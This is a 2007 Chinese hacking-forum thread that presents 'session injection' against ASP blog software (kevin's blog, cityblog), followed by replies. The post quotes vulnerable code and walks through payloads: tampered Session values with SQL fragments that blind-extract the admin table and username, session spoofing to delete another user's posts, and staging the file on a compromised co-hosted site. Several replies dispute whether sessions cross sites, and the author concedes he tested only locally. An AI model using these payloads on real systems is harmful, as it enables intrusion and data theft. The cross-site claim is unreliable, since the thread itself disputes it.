文章作者: 落叶纷飞 & 华夏鸡头4 [S.S.T]
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

注意：文章首发脚本安全小组论坛（www.Cnsst.Org），后由原创作者友情提交到邪恶八进制信息安全团队，转载请注明首发站点。

——思路源于“流转”
首先说明，本文不是讲session欺骗方法或原理。
  1年前流转跟我说他有一个想法，就是session注入，当时我认为有点不可能，因为session很少进库的，就算进库了，也注射不了，就算能注射，也不能回显，对access没什么用处。后来看“寂寞的刺猬”大哥写的一篇漏洞分析文章的时候无意中发现他截取的代码里有session进库了，所以昨晚无聊，就test了起来。
  我们首先可以来证明一下session是否能注入，来看kevin's blog的setting.asp文件的一段代码（kevin大家不要打我哦=）:
....省略....

复制内容到剪贴板

代码:

<%
if session("Admin")<>"ok" then
response.redirect("index.asp")
end if
if request.Form("passwd")<>"" and request.Form("passwd1")<>"" and request.Form("passwd2")<>"" then
dim rs
set rs=Server.Createobject("Adodb.recordset")
sql="select * from kevinadmin"
rs.open sql,conn
oldpass=rs("k_pass")
if oldpass<>request.Form("passwd") then
response.write "第一次验证失败<br>"
else
if request.Form("passwd1")<>request.Form("passwd2") then
response.write "两次输入不同<br>"
else
rs.close
sql="update kevinadmin set k_pass=&#39;" & request.Form("passwd2") &"&#39; Where k_user=&#39;" & session("user") & "&#39;"
&#39;response.write sql
rs.open sql,conn
if err then
response.write "修改失败"
else
response.write "修改成功"
end if
end if
end if
end if
%>

....省略....
  这个是修改管理员密码的文件，但是请大家注意这一句“sql="update kevinadmin set k_pass='" & request.Form("passwd2") &"' Where k_user='" & session("user") & "'"”，看到了吧session居然进库了，出于测试的目的，我们把它的代码改一下，去掉管理员认证。代码如下:
....省略....

复制内容到剪贴板

代码:

<%
dim rs
set rs=Server.Createobject("Adodb.recordset")
sql="select * from kevinadmin"
rs.open sql,conn
oldpass=rs("k_pass")
rs.close
sql="update kevinadmin set k_pass=&#39;" & request.Form("passwd2") &"&#39; Where k_user=&#39;" & session("user") & "&#39;"
&#39;response.write sql
rs.open sql,conn
if err then
response.write "修改失败"
else
response.write "修改成功"
end if
%>

....省略....
  我把它保存为1.asp，现在我们来构造一个2.asp，代码如下:

复制内容到剪贴板

代码:

<%
session("user")="Huanhuan&#39;and 1=2 and &#39;1&#39;=&#39;1"
%>

这里要注意一下，kevin's blog的管理员名为Huanhuan，密码为123456。OK，我们先打开这个2.asp文件，然后再打开1.asp，其他的地方不用输入，只要在“新管理密码”里输入新的密码就行，我们来输入1234，然后点提交，如图1。

7_4_b42c8c94bcd5e82.jpg (13 KB)

2007-8-4 12:43

  修改失败，呵呵，我们把2.asp的代码改为如下:

复制内容到剪贴板

代码:

<%
session("user")="Huanhuan&#39;and 1=1 and &#39;1&#39;=&#39;1"
%>

再修改下密码，怎么样，修改成功了吧，如图2。

7_4_e092ba260ff9006.jpg (13 KB)

2007-8-4 12:43

  这样初步证明了session是可以注入的，但是我想如果没有实例的话大家可能不会服，好的，我们来看实例。就拿cityblog来做个例子，cityblog是一款多用户blog，读过它的代码的人都知道，它过滤得非常严谨。我们来看UserManage/Article_Del.Asp文件的一段代码:
....省略....

复制内容到剪贴板

代码:

IF CblogObj.FormRequest("Action")="delete" And CblogObj.FormRequest("ArticleID")<>"" Then
Dim ArticleID,Ch
ArticleID=CblogObj.FormRequest("ArticleID")

....省略....

复制内容到剪贴板

代码:

Set Rs=Conn.Execute("Select Article_Code From Article Where Article_ID IN("& ArticleID &") GROUP BY Article_Code")
DO While Not Rs.Eof
Ch=Ch & "|" & "Article_ByClass" & Rs(0)
RS.MoveNext
Loop
Rs.Close:Set Rs=Nothing
IF INSTR(Ch,"|")>0 Then
Ch=Mid(Ch,2)
End IF
Conn.Execute "Delete From Article Where User_ID="& Session("UserID") &" And Article_ID IN("& ArticleID &")"
Conn.Execute "Delete From Tb_Reply Where Reply_User="& Session("UserID") &" And Reply_Blog_ID IN("& ArticleID &")"
Conn.Execute("delete from TrackBack where ArticleID in("& ArticleID &")")

....省略....
  ArticleID在赋值的时候就做了过滤，但是我们看看Session("UserID")这个session变量，根本没做过滤就丢到库里了，呵呵，大家不用急着看注入结果，我们先来从session欺骗去攻击他。
  注册两个，一个名为asdasd，密码111111；另一个为asdasdaa，密码222222，用asdasd发表一篇日志，名为“aaaaaaa”内容随便；用asdasdaa发表一篇名为“bbbbbbbb”的日志。然后用asdasdaa用户进入“日志列表”里，现在我们来构造一个设置session的asp文件s.asp，代码如下:

复制内容到剪贴板

代码:

<%
Session("UserID")="105"
%>

这里可能有人会问，怎么确定userid呢？请看图3。

7_4_19d4dd07c96e5c4.jpg (9 KB)

2007-8-4 12:43

  “user0”跟着后面的那个数字就是userid了，这里asdasd的userid为105，asdasdaa的userid为106。我们打开s.asp，然后刷新一下“日志列表”页面，如图4。

7_4_33f41852b1d9f0d.jpg (32 KB)

2007-8-4 12:43

  看到了吗？asdasd发表的日志显赫的摆在眼前，而且还能删除。
  呵呵，欺骗成功了。现在我们从session注入的角度来攻击他，我们用asdasdaa发8篇日志，然后构造设置session的文件s.asp，代码如下:

复制内容到剪贴板

代码:

<%
Session("UserID")="106 and 1=1"
%>

我们打开s.asp，然后随便选中一篇日志（要记住这篇日志的名称），点击“删除”按钮，删除成功！再来，我们吧s.asp的代码改为:

复制内容到剪贴板

代码:

<%
Session("UserID")="106 and 1=2"
%>

打开s.asp，然后随便选中一篇点击日志（记住日志名称），然后点击删除，提示删除成功了，但是我们回到“日志列表”看一看，居然没有日志了，如图5

7_4_05991d6af3ec242.jpg (38 KB)

2007-8-4 12:43

  呵呵，我们重新登录asdasdaa一下，打开“日志列表”看看，哈哈！除了and 1=1删除的那篇日志之外，其他的日志都存在。我们看把代码修改为:

复制内容到剪贴板

代码:

<%
Session("UserID")="106 and exists(select count(*) from tb_admin)"
%>

然后随便点一篇日志删除（记住日志名，下面不打了。累....），哈哈，删除成功，证明存在tb_admin这个表。再来，把代码修改为:

复制内容到剪贴板

代码:

<%
Session("UserID")="106 and exists(select count(*) from tb_adm)"
%>

删除一篇日志，哈哈出现了and 1=2的页面，证明不存在表tb_adm。继续测试，代码如下:

复制内容到剪贴板

代码:

<%
Session("UserID")="106 and exists(select Blog_Admin_Name from tb_admin)"
%>

删除日志成功，证明tb_admin中存在Blog_Admin_Name字段，呵呵。再来，代码如下:

复制内容到剪贴板

代码:

<%
Session("UserID")="106 and exists(select len(Blog_Admin_Name) from tb_admin)=5"
%>

删除成功，说明Blog_Admin_Name中的第一个管理员用户名的长度为5。再来，代码如下:

复制内容到剪贴板

代码:

<%
Session("UserID")="106 and exists(select left(Blog_Admin_Name,1) from tb_admin)=&#39;j&#39;"
%>

日志全没了，说明Blog_Admin_Name字段的第一个管理员名的第一个字符不是j。再来，代码如下:

复制内容到剪贴板

代码:

<%
Session("UserID")="106 and exists(select left(Blog_Admin_Name,1) from tb_admin)=&#39;a&#39;"
%>

删除成功，说明Blog_Admin_Name字段的第一个管理员名的第一个字符是a。继续继续，代码如下:

复制内容到剪贴板

代码:

<%
Session("UserID")="106 and exists(select left(Blog_Admin_Name,5) from tb_admin)=&#39;admin&#39;"
%>

删除成功，说明Blog_Admin_Name字段的第一个管理员的用户名为admin。
  继续....（后面的你们来继续了=）
  总结一下，这种方法的注入虽然比较麻烦，也有一定的局限性（必须拿下一个PZ站），但是他胜在是永远是一个变量，只是临时存在于服务器，IDS什么的都不能检测，倒，IIS也更不会有什么记录。我测试的是access数据库的，MSSQL的那就请大家自行测试了。还要说一下，PHP中貌似还有一个函数能构造注入，虽然很少能进库，但是也是一种新的攻击方法，因为我的mysql5.0有点问题，所以测试不了，有兴趣的朋友可以自行测试。PHP的session注入我也没测试，也不知道诸如“'”“/”之类的会不会被替换掉。好了，文章到这里，随便说下我的测试环境:WinXP+IIS5.1+Access。
  研究了一个通宵了，如果文章有什么疏漏还请各位指点，不要骂我哦。=)

徒弟的帖子 顶下

<%
dim rs
set rs=Server.Createobject("Adodb.recordset")
sql="select * from kevinadmin"
rs.open sql,conn
oldpass=rs("k_pass")
rs.close
sql="update kevinadmin set k_pass=&#39;" & request.Form("passwd2") &"&#39; Where k_user=&#39;" & session("user") & "&#39;"
&#39;response.write sql
rs.open sql,conn
if err then
response.write "修改失败"
else
response.write "修改成功"
end if
-----------------
这个是没有验证的页面

而“sql="update kevinadmin set k_pass=&#39;" & request.Form("passwd2") &"&#39; Where k_user=&#39;" & session("user") & "&#39;"”
这里调用的过程的没有验证是无法执行的

而你保存的
<%
dim rs
set rs=Server.Createobject("Adodb.recordset")
sql="select * from kevinadmin"
rs.open sql,conn
oldpass=rs("k_pass")
rs.close
sql="update kevinadmin set k_pass=&#39;" & request.Form("passwd2") &"&#39; Where k_user=&#39;" & session("user") & "&#39;"
&#39;response.write sql
rs.open sql,conn
if err then
response.write "修改失败"
else
response.write "修改成功"
end if
%>

去掉了条件限制，所以成功了。

session注射 其实也就是sql注射的一种
条件限制太多
所以人也就没重视


没有验证方式的session

晕，你的注入方式是写了一个asp来改sesson，请问你如果没有对方服务器权限的话，你的asp放在哪？sesson值每个站点是对应的。就是你说拿下pz（我没理解错的话是旁注）站，你改的asp文件放上去也是不可以的。

如果你能构造一个
Huanhuan&#39; or username=admin&#39;
这样的用户,就有可能把管理员密码改了.

但是可能吗,?
和楼上一样,我也不知道你构造的asp文件给放哪.

我是在本地测试的

可以把asp文件放在同一服务器的旁注站啊，不是说了么，至少要拿下一个旁注站啊～～

觉得不太可能啊！sesson值每个站点是对应的！

在几天之前 fhod教我用session 来直接跳过其他站的后台验证 进入到后台..
也是旁注一个站之后通过上传,之后构造验证语句.保存为asp文件..
方法一样..
楼主的方法很可行..
session 保存在服务器上.....
所以只要拿到同一服务器上的任意一个站点 那么目标站就可以注.

有机会找个PZ站试下最好.
某商城程序也存在一个session的问题
拿到webshell了..想进后台..密码MD5的没破出..我也是用这方法1.asp访问下..进了后台.
但是PZ站也还真没测试...

引用:

引用第5楼ddiovedd于2007-08-04 17:00发表的 :
觉得不太可能啊！sesson值每个站点是对应的！

是的，很多程序都把session定植了，而且不进库例如if session("aaa")<>"ok" then这样的话是伪造不了的，但是如果session的值额为变量的话，那就可以伪造了

拿下一个旁注站应该不难吧～～·

文中还有一句我忘了说，有session注入的地方就有session欺骗！！

   我是不知道SESSION值所对应站的问题

不过我是成功过 某某程序有简单的判断SESSION值的洞洞 我PZ一个站 弄了一个对应SESSION

值的ASP文件 成功进入到后台

引用:

引用第4楼落叶纷飞于2007-08-04 15:33发表的 :
我是在本地测试的

可以把asp文件放在同一服务器的旁注站啊，不是说了么，至少要拿下一个旁注站啊～～

楼主勇气可嘉，session的概念没有弄清大作就出来了．给你打个比方www.aa.com和www.bb.com在同一服务器上,都放了两个动网,如果按你的逻辑，两个动网的管理员可以互相进对方后台了．

session入库的话应当也可以注入（我没有测试过），但是不应当是你的这种方法去注入．

引用:

引用第4楼落叶纷飞于2007-08-04 15:33发表的 :
我是在本地测试的
可以把asp文件放在同一服务器的旁注站啊，不是说了么，至少要拿下一个旁注站啊～～

建议去看看 MS WEBCAST 的 IIS5.1/6.0内幕 视频教学 ..... 现在 IIS6的 默认配置都是每一个站都是不同实例的~~ SESSION会相同？什么理论~~

我只想说这个Session在本地测试和远程测试是有很大区别的，那个百度流转的Session欺骗漏洞也是一个骗局，作者根本没有去测试就发出来了。

刚才俺在http://www.chinahacker.net/1.asp写下了如下代码：
<%
session("username")="abddwww"
%>
又在同一主机另一个站点下写下了如下代码：(test.asp)
<%
if session("username")<>"" then
  response.write "ok"
else
  response.write "no session"
end if
%>
先访问test.asp返回no session，然后访问1.asp，再次访问test.asp还是返回no session（同一ie进程下）
说明想跨站是不成功的

说了我是在本机测试的！！

我手头上没有服务器，测试不了

但是N久前无月曾经用session欺骗搞了一个站

我没测试我就不知道了

我刚测试欺骗一个EWEBEDITOR的站成功了....不知道是不是IIS设置问题，不过如果是APACHE就不知道了

引用:

引用第16楼落叶纷飞于2007-08-05 13:23发表的 :
我刚测试欺骗一个EWEBEDITOR的站成功了....不知道是不是IIS设置问题，不过如果是APACHE就不知道了

漏洞的高手有什么意见么？

空口无凭，13楼的gaby的代码很清楚的证实了。你要证明的是在虚拟主机www.aaa.com上欺骗虚拟主机www.bbb.com。不是在www.aaa.com上欺骗www.aaa.com
再一个你本机测试也可以用虚拟主机的，申请两个免费的二级域名（不要转发的）不是难事

不是，我刚搞了个站，能跨目录的

服务器上的www.x1.cn有ewebeditor，我欺骗成功了

这样我也不清楚了,最起码本文也证明了session注入的存在啊，呵呵

引用:

引用第18楼落叶纷飞于2007-08-05 13:45发表的 :
不是，我刚搞了个站，能跨目录的

服务器上的www.x1.cn有ewebeditor，我在www.x2.cn里欺骗成功了

我不信，正好有搜到了
http://forum.eviloctal.com/read-htm-tid-20613.html
这帖子，是你说的ewebeditor欺骗。

你成功了，除非www.x1.cn和www.x2.cn是绑定在同一主机头下，同目录

94同目录的 =)

服务器上的其他站点测试不成功

但是 神无月 搞个站的时候测试成功了,那我就不知道了～～！

可以的...
我有测试成功过
通过session..
来跳过后台验证...
还是fhod教我的....
  不过可能是不同的程序,有的过滤了,有的没过率

``2个站点主机头不同并且不是在同目录下的话``session是不同的```

访问asp文件,并创建了web应用程序
IIS在Web站点中指定应用程序的启动点目录
启动点目录下的文件和子目录都是应用程序的一部分
并使用目录作为边界定义不同应用程序的作用域
不同的web站点的就会对应不同的web应用程序,作用域也就不同.
session只是web应用程序的一个对象.当然也就不能跨出该作用域

ps:网上找的关于session的概念和自己的理解.以前也做过测试session确实不能跨web

关于这个 Session 注入,顶多是参数获得(或者叫传递)的方式不同而已,以此我们还可以写"COOKIES注入" "TXT文件注入" "XML文件注入" 等等等等,只要SQL语句中某变量从这些 COOKIES TXT XML 获得就行了,最多是更改值源而已.

这里楼主要知道一点, Session 只对应某域名下的站点,而非整台服务器(如果是那样,我站点所在服务器的站我都能黑了)...所以说你想要修改 Session 的话...呵呵..已经是多此一举了.

哦.忘说了...现在补充。

目前几乎所有的系统都是靠 Session 来验证管理员的,如果你能修改 Session 的话,直接欺骗吧..什么?你问我MD5?好吧.既然你都可以改 Session 了,相信你也可以打开 MDB 找 MD5 了吧.

我都说了我写错了！！

我写这烂文只是证明session注入的存在！！